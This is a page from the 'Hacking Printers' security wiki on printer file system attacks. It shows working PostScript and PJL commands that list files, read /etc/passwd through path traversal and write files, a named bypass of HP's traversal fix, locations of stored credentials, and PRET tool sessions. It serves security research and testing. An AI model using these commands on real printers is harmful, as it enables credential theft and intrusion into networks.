File system access

From Hacking Printers
Jump to: navigation, search

If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files through write access might even lead to remote code execution – for example by editing rc scripts or replacing binary files to be executed. Therefore printers should never allow direct access to the file system. However, legitimate language constructs are defined for PostScript [1] and PJL [2] to do exactly this. Such features exist for historic reasons when bandwidth was a major bottleneck. Frequently used fonts and graphics are once downloaded to the device and can be re-used in further print jobs. While such functionality enhances printing performance, it poses a severe security risk to networked devices.

PostScript

The potential danger of PostScript file I/O primitives has been pointed out by [3]. An effort to systematically exploit PostScript functions to access the file system of printer devices has been made be [4]. Example code to access the file system with PostScript on a HP LaserJet 4200N is given below:

> /str 256 string def (%*%../*)                               % list all files
> {==} str filenameforall
< (%disk0%../webServer/home/device.html)
< (%disk0%../webServer/.java.login.config)
< (%disk0%../webServer/config/soe.xml)

> /byte (0) def                                                % read from file
> /infile (../../../etc/passwd) (r) file def
> { infile read {byte exch 0 exch put
>   (%stdout) (w) file byte writestring}
>   {infile closefile exit} ifelse
> } loop
< root::0:0::/:/bin/dlsh

> /outfile (test.txt) (w+) file def}}                         % write to file
> outfile (Hello World!) writestring
> outfile closefile

Accessing files with PostScript is supported by a large variety of printers, but usually sandboxed to a certain directory. This limits the possibilities of an attacker to mostly harmless actions like font modification. There are however exceptions:

  • Various HP LaserJet printers are prone to path traversal which allows access to the whole file system. This issue which affects almost forty HP devices has been discussed in CVE-2012-5221 and is fixed in current firmware versions. The protection mechanism however is flawed as shown in [4]: By using %*% as disk prefix and replacing ../ with .././ one is able to access the whole file system even for the latest firmware versions. The impact is significant: Passwords for the embedded web server can be found in /dev/rdsk_jdi_cfg0 while the RAM is available for reading and writing at /dev/dsk_ram0.
  • Various OKI laser printers allows one level of path traversal, where a directory called ‘hidden’ is located which contains stored fax numbers, email contacts and local users' PINs as well as the SNMP community string and password. More interesting however is the fact that this MFP can be integrated into a network using features like Email-to-Print or Scan-to-FTP. Therefore we can find the passwords for LDAP, POP3, SMTP, outbound HTTP proxy, FTP, SMB and Webdav as well as the IPsec and Wi-Fi pre-shared keys. This is a good example how an attacker can escalate her way into a company's network, using the printer device as a starting point.

How to test for this attack?

File system access has been implemented in PRET in ps mode using the ls, get, put, append, delete, rename, find, mirror, touch, mkdir, cd, pwd, chvol, traversal, format, fuzz and df commands:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> ls ../..
d        -   Jan  1  1970 (created Jan  1  1970)  bootdev
d        -   Jan  1  1970 (created Jan  1  1970)  dsk_jdi
d        -   Jan  1  1970 (created Jan  1  1970)  dsk_jdi_ss
d        -   Jan  1  1970 (created Jan  1  1970)  dsk_ram0
d        -   Jan  1  1970 (created Jan  1  1970)  etc
d        -   Jan  1  1970 (created Jan  1  1970)  tmp
d        -   Jan  1  1970 (created Jan  1  1970)  webServer

Who can perform this attack?

Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.

PJL

For PJL, the issue of accessing arbitrary files on a printer with PJL has first been demonstrated by [5] who wrote the PFT and Hijetter programs to perform file operations on HP LaserJets using legitimate PJL commands. A virtual, distributed file system based on PJL has been proposed and implemented by [6]. Example code to access the file system access with PJL on a HP LaserJet 4200N is given below:

> @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535               (list all files)
< .\:\:TYPE=DIR
< ..\:\:TYPE=DIR
< PostScript TYPE=DIR
< PJL TYPE=DIR
< saveDevice TYPE=DIR
< webServer TYPE=DIR

> @PJL FSQUERY NAME="0:\..\..\etc\passwd"                     (read from file)
< @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23
> @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23
< root::0:0::/:/bin/dlsh

> @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt"                  (write to file)
> Hello World!

Accessing files with PJL is not supported by many printers. Examples are given below:

  • Various HP LaserJet printers are prone to path traversal which allows access to the whole file system (see CVE-2010-4107). The countermeasure proposed by HP is to enable disk lock [7] which can easily be broken either by resetting the device to factory defaults or by performing brute-force attacks.
  • Various HP OfficeJet Pro and PageWide Pro models allow attackers to read arbitrary files from the Linux based file system. Furthermore, a path traversal vulnerability exists which enables attackers to place a shellscript in 0:/../../rw/var/etc/profile.d/, reboot the device (for example, using SNMP) and therefore execute arbitrary commands [8].
  • For various Konica Minolta bizhub MFPs the contents of the root directory – which is a typical Linux file system – can be listed. One interesting file which can be read and written is /../sysdata/acc/job.csv, which contains logged print job metadata, including document titles and usernames.

How to test for this attack?

File system access has been implemented in PRET in pjl mode using the ls, get, put, append, delete, find, mirror, touch, mkdir, cd, pwd, chvol, traversal, format, fuzz and df commands:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> ls ..
d        -   bootdev
d        -   dsk_jdi
d        -   dsk_jdi_ss
d        -   dsk_ram0
d        -   etc
d        -   lrt
d        -   tmp
d        -   webServer
d        -   xps

Who can perform this attack?

Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.



  1. PostScript Language Reference Manual, 2nd Edition, Adobe Systems Inc., 1992, p. 71-80
  2. Printer Job Language Technical Reference Manual, HP Inc., 1997, ch. 9
  3. Malicious Data and Computer Security, W. Sibert, Proceedings of the 19th National Information Systems Security Conference, 1996
  4. 4.0 4.1 Exploiting Network Printers, J. Müller, 2016, p. 48-50
  5. Attacking Networked Embedded Devices, Black Hat USA, FX and FtR of Phenoelit, 2002
  6. Printers Gone Wild, B. Smith, ShmooCon, 2011
  7. Security Bulletin HPSBPI02575 SSRT090255 Rev. 1, HP Inc., 2010
  8. Rooting a Printer: From Security Bulletin to Remote Code Execution, Jacob Baines, 2017